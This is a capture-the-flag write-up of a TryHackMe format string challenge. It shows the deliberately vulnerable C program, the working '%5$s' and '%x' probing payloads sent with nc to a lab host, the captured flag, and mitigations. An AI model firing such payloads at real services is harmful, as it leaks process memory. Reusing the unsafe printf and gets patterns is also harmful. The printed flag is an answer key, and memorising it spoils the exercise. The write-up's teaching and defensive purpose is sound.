Format String Vulnerability Deep Dive: From Principle to Practical Exploitation

Flag: THM{format_issues}

Overview

A format string vulnerability is a classic memory safety vulnerability that primarily occurs when developers fail to properly handle user input when using printf family functions. This article, through a practical case from the TryHackMe platform, deeply analyzes the attack principle, memory mechanism, and practical exploitation techniques of this vulnerability.

Format String Vulnerability Principle

Vulnerability Cause

The root cause of format string vulnerabilities lies in the design mechanism of the printf family functions:

Parameter Count Mismatch: The printf function cannot verify at compile time whether the format string and the number of parameters match.

Stack Memory Access: When the number of format specifiers in the format string exceeds the number of parameters provided, the function continues to read data from the stack.

Type Conversion Danger: Attackers can use specific format specifiers to force the function to interpret memory data in different types.

Internal Mechanism of the printf Function

When calling printf(format, arg1, arg2, ... ), the format string format is parsed character by character. When % is encountered, the value is retrieved from the parameter list according to the subsequent format specifier. If the number of format specifiers exceeds the number of parameters, the function continues to read from the next location on the stack.

Vulnerable Code Analysis

Let's delve into this vulnerable program:

c
#include <stdio.h>
#include <string.h>

void print_banner(){
    printf( "  ______ _          __      __         _ _   \n"
        " |  ____| |         \\ \\    / /        | | |  \n"
        " | |__  | | __ _  __ \\ \\  / /_ _ _   _| | |_ \n"
        " |  __| | |/ _` |/ _` \\ \\/ / _` | | | | | __|\n"
        " | |    | | (_| | (_| |\\  / (_| | |_| | | |_ \n"
        " |_|    |_|\\__,_|\\__, | \\/ \\__,_|\\__,_|_|\\__|\n"
        "                  __/ |                      \n"
        "                 |___/                       \n"
        "                                             \n"
        "Version 2.1 - Fixed print_flag to not print the flag. Nothing you can do about it!\n"
        "==================================================================\n\n"
          );
}

void print_flag(char *username){
        FILE *f = fopen("flag.txt","r");
        char flag[200];

        fgets(flag, 199, f);
        //printf("%s", flag);
    
    //The user needs to be mocked for thinking they could retrieve the flag
    printf("Hello, ");
    printf(username);  // 🚨 Vulnerability: User input is directly used as a format string
    printf(". Was version 2.0 too simple for you? Well I don't see no flags being shown now xD xD xD...\n\n");
    printf("Yours truly,\nByteReaper\n\n");
}

void login(){
    char username[100] = "";

    printf("Username: ");
    gets(username);  // 🚨 Buffer overflow risk: Input length is not checked

    // The flag isn't printed anymore. No need for authentication
    print_flag(username);
}

void main(){
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    // Start login process
    print_banner();
    login();

    return;
}

Key Vulnerability Analysis

1. Format String Vulnerability (Line 37)

c
printf(username);  // Dangerous! Should use printf("%s", username);

Problem Analysis:

The username variable is directly passed to printf as a format string. Attackers can include format specifiers (such as %x, %s, %p, etc.) in their input. These format specifiers will cause printf to read additional data from the stack.

2. Buffer Overflow Risk (Line 46)

c
gets(username);  // Dangerous function, deprecated

Problem Analysis:

The gets() function does not check the input length, which can lead to buffer overflow. The username array is only 100 bytes, and overly long input will overwrite other data on the stack.

3. Flag Data Leakage Opportunity (Lines 30-32)

c
FILE *f = fopen("flag.txt","r");
char flag[200];
fgets(flag, 199, f);

Key Point:

The flag is read into the local variable flag[200]. Although it is commented out and not directly printed, the data is still in stack memory. This data can be accessed indirectly through the format string vulnerability.

Memory Layout and Attack Mechanism

Stack Memory Layout Analysis

When the print_flag function is called, the stack layout is roughly as follows:

text

Stack Top (Low Address)
├─ FILE *f (fopen return value)
├─ char flag[200] (stores the read flag content)
├─ ...other local variables...
├─ Return Address
├─ Saved EBP
├─ char *username (passed parameter)
└─ main function's stack frame
Stack Bottom (High Address)

Stack Traversal Mechanism of Format String

When printf(username) is executed, if username is plain text, it will be output normally. In an attack scenario, if username contains format specifiers, printf will attempt to retrieve the corresponding parameters from the stack.

Parameter Position Calculation

In x86/x64 architectures, the first parameter is the format string itself (username), the second parameter is the next value on the stack, the third parameter is the next value after that, and so on. The Nth parameter is the value at the corresponding location on the stack.

Since the flag[200] array is on the stack, the flag content can be accessed through the appropriate offset.

Attack Vector Analysis

Payload Analysis

Successful attack payload:

bash
echo -ne '%5$s' | nc 10.10.20.224 1337

Detailed Analysis:

%5$s directly accesses the value at the 5th parameter position. The $ syntax allows direct specification of the parameter position without traversing the preceding parameters. The s format specifier treats the value at that position as a string pointer and prints the content it points to.

Why the 5th Parameter?

By experimenting with different offsets:

bash
# Example command to probe stack content
echo -ne '%x %x %x %x %x %x %x %x %s' | nc 10.10.52.86 1337

After testing, it was found that the 1st-4th parameters are other data on the stack, the 5th parameter happens to point to the address of the flag string, and the 6th and subsequent parameters are other memory contents.

Impact of Memory Alignment

In real-world environments, the exact location of the flag on the stack may vary due to compiler optimization levels, stack alignment methods, system architecture (32-bit/64-bit), and the allocation of other local variables.

Therefore, it may be necessary to try different offsets (%4$s, %5$s, %6$s, etc.) to locate the flag.

Practical Attack Demonstration

Complete Process of a Successful Attack

bash
$ echo -ne '%5$s' | nc 10.10.20.224 1337
  ______ _          __      __         _ _   
 |  ____| |         \ \    / /        | | |  
 | |__  | | __ _  __ \ \  / /_ _ _   _| | |_ 
 |  __| | |/ _` |/ _` \ \/ / _` | | | | | __|
 | |    | | (_| | (_| |\  / (_| | |_| | | |_ 
 |_|    |_|\__,_|\__, | \/ \__,_|\__,_|_|\__|
                  __/ |                      
                 |___/                       
                                             
Version 2.1 - Fixed print_flag to not print the flag. Nothing you can do about it!
==================================================================

Username: Hello, THM{format_issues}
. Was version 2.0 too simple for you? Well I don't see no flags being shown now xD xD xD...

Yours truly,
ByteReaper

Analysis of Successful Attack Principle

Input payload: %5$s

printf processing: When the program executes printf(username), the content of username is %5$s. printf parses the format specifier %5$s, accesses the value at the 5th position on the stack as a string pointer, and the 5th position happens to point to the memory address of the flag string.

Output result: Successfully displays the flag content THM{format_issues}

Other probing payloads

Command for probing stack structure:

bash
# Displays hexadecimal values of multiple stack locations
echo -ne '%x %x %x %x %x %x %x %x %s' | nc 10.10.52.86 1337

This payload displays the hexadecimal values of the first eight stack locations and finally uses %s to attempt to print the ninth location as a string.

Key Elements of Vulnerability Exploitation

Format string vulnerability: printf(username) directly uses user input as the format string.

Sensitive data in memory: The flag is read into a local variable on the stack.

Predictable memory layout: The stack layout is relatively fixed in the same environment.

Direct position access: The %N$s syntax allows direct access to specific stack locations.

Protection Mechanisms and Security Recommendations

Code-Level Protection Measures

1. Safe printf Usage

c
// Dangerous way
printf(user_input);

// Safe way
printf("%s", user_input);

2. Input Validation and Length Check

c
// Replace the dangerous gets() function
char username[100];
if (fgets(username, sizeof(username), stdin) != NULL) {
    // Remove possible newline character
    username[strcspn(username, "\n")] = '\0';
}

3. Avoid Storing Sensitive Data on the Stack

c
// Unsafe: Sensitive data on the stack
void print_flag(char *username) {
    char flag[200];  // On the stack, potentially leaked
    // ...
}

// Safer: Use dynamic allocation or other protection mechanisms
void print_flag(char *username) {
    char *flag = malloc(200);
    // Zero out and free immediately after use
    memset(flag, 0, 200);
    free(flag);
}

Compiler-Level Protection

1. Compiler Warnings

bash

# Enable format string related warnings
gcc -Wformat -Wformat-security -Wall source.c

2. FORTIFY_SOURCE

bash
# Enable runtime checks
gcc -D_FORTIFY_SOURCE=2 -O2 source.c

System-Level Protection

1. Address Space Layout Randomization (ASLR)

Randomizes the memory addresses of the stack, heap, and libraries, making it difficult for attackers to predict the memory layout.

2. Stack Protection (Stack Canary)

bash

# Enable stack protection
gcc -fstack-protector-all source.c

3. Non-executable Stack (NX bit)

Prevents code execution on the stack, reducing the risk of code injection attacks.

Modern Protection Techniques

1. Control Flow Integrity (CFI)

Detects and prevents control flow hijacking attacks.

2. Address Space Isolation

Uses containerization or sandboxing techniques to isolate applications.

3. Static Analysis Tools

Uses tools such as Clang Static Analyzer, Coverity, etc., to find potential vulnerabilities during development.

Secure Development Recommendations

1. Secure Programming Principles

Principle of least privilege: Programs only obtain the necessary permissions.

Input validation: Strictly validate all external inputs.

Defensive programming: Assume all inputs are malicious.

2. Code Review

Focus on string handling functions, check the use of format strings, and verify buffer boundary checks.

3. Security Testing

Fuzzing: Use tools such as AFL, libFuzzer.

Static analysis: Integrate into CI/CD pipelines.

Dynamic analysis: Use Valgrind, AddressSanitizer, etc.

Summary

Format string vulnerabilities, while a classic security vulnerability, still exist in modern software development. Through the analysis in this article, we can see:

Vulnerability principle: Inherent flaws in the design of printf family functions.

Attack methods: Utilizing stack memory layout and format specifiers.

Protective measures: Multi-layered security protection strategies.

Key lessons include: Never use user input directly as a format string; sensitive data should be avoided from being stored in predictable memory locations; adopt multi-layered protection strategies, rather than relying on a single security mechanism; regularly conduct security code reviews and testing.

This case reminds us again that we must pay extra attention to memory safety when writing C/C++ programs, especially when handling user input. Modern compilers and operating systems provide various protection mechanisms, but the security awareness and programming habits of developers remain the most important first line of defense.